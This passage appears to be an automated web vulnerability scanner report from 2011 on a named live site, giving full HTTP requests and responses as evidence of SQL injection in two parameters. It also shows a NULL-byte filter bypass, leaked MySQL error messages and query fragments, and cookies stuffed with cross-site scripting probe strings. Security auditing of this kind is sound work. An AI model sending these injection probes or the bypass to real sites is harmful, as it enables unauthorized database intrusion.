User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:28:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bl5uk588nba96ol98n5jjn0rm0; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project_dynamic_page_updated.php was not found on this server.</p>

1.207. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5120kn3h6994pbsmjqgkoo0c54; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1'=1' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r9cb9v2fhq1ifng9ecfsa3gp80; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project_dynamic_page_updated.php was not found on this server.</p>

1.208. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3%00' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=l9ln6kgnlp489sj11sr55vl645; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3.'' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3.'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&templa' at line 5

Request 2

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3%00'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 